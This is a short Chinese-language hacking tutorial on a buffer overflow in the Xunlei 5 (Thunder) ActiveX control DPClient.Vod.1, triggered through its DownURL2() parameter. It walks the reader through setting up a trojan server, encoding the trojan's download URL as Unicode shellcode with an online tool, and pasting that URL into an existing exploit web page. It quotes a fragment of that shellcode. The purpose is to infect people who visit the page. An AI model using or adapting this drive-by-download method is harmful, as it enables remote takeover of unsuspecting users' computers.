迅雷5 ActiveX控件可实现远程溢出
　　Web迅雷的高危漏洞才爆出没有多久，最近Web迅雷的老大哥，迅雷5也出现了一个高危的漏洞。经过测试发现，迅雷 5.6.9.344版本的ActiveX控件上存在多个缓冲区溢出漏洞，远程攻击者可以利用此漏洞控制用户系统。
　　经过我的试验，迅雷5中的DPClient.Vod.1 ActiveX控件文件，在处理传送给DownURL2()的参数的时候会造成数据溢出。这样如果用户受骗访问了恶意网页的话，就可能触发软件缓冲区溢出，会让远程攻击者执行任意指令。
恶意代码“攻陷” 迅雷5
　　第一步：首先配置一个木马的服务端程序，然后将它上传到自己的网络空间中，这样就得到了木马地址。现在我们对这个木马地址进行加密处理。在搜索引擎里面搜索“网页加密”，接着在搜索到的加密网站里面，比如http://www.cha88.cn/safe/shellcode.Php，输入木马地址后点击“Ascii→Unicode”即可。

　　第二步：现在配置迅雷漏洞的利用网页。由于没有现成的漏洞生成工具，因此只有修改网络中现成的漏洞代码。在源代码中有如下的一句信息：“%u6946%u656c%u0041%u7468%u7074此处为需要下载病毒的网址%u0000”，现在只需要将加密后的网页木马地址，复制到代码里面指定的位置就可以了。